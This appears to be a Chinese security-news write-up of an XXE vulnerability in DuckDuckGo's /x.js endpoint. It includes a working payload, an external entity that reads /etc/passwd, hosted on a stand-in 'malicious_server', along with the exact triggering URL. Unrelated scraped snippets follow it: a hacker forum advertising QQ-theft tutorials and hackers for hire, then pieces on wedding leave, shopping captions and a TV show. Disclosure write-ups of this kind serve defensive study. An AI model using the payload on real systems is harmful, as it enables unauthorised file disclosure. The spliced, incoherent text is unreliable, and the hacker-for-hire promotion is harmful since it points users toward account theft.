近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。
DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。
漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。
只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。
而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。
具体步骤如下
1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。
<?xm l version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml
3.返回的页面可以看到xm l文件解析结果
本文目录一览: 1、黑客的主要攻击手段包括 2、个人电脑怎么防止黑客攻击 3、怎样防范黑客攻击? 4、关于黑客 黑客的主要攻击手段包括 黑客攻击手段可分为非破坏性攻击和破坏性攻击两类。非...
完婚针对工作的人而言也是发福利的,例如法定婚假,2019年刚开始国家法定的婚假有几天呢?下边大家一起去掌握掌握今日结婚对象能够耍几日有薪法定婚假。 一、婚假几天国家法定2019 地域不一样法定...
双十一可以是有一群人的狂欢,也可以是一个人的孤单,双十一是购物节也是狂欢节,一边提醒你单身,一边提醒你穷,下面友谊长存小编就带来双十一的朋友圈文案说说大全,适合双十一发的朋友圈说说。 双十一的朋友圈...
黑客技术交流论坛QQ(黑客技术盗qq号教程)(baidusina)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客...
很多人都认为自身删除了手机微信东拉西扯纪录,私人信息就不容易泄漏,确实不然,很多表层上的删掉是非常容易被修复,不然在网上为什么会有那么多的“网络红人”修复方法,但是要想彻底删除且不可以被修复的方法确实...
2013-04-18HappyTogether3EP295,天命剧组,同台:李东旭、任瑟雍望采纳 有两期,一期是强力班,一期是天命 那不代表就是不熟悉毕竟是来宾也是个尊重 截止到2020年3月,宋智孝...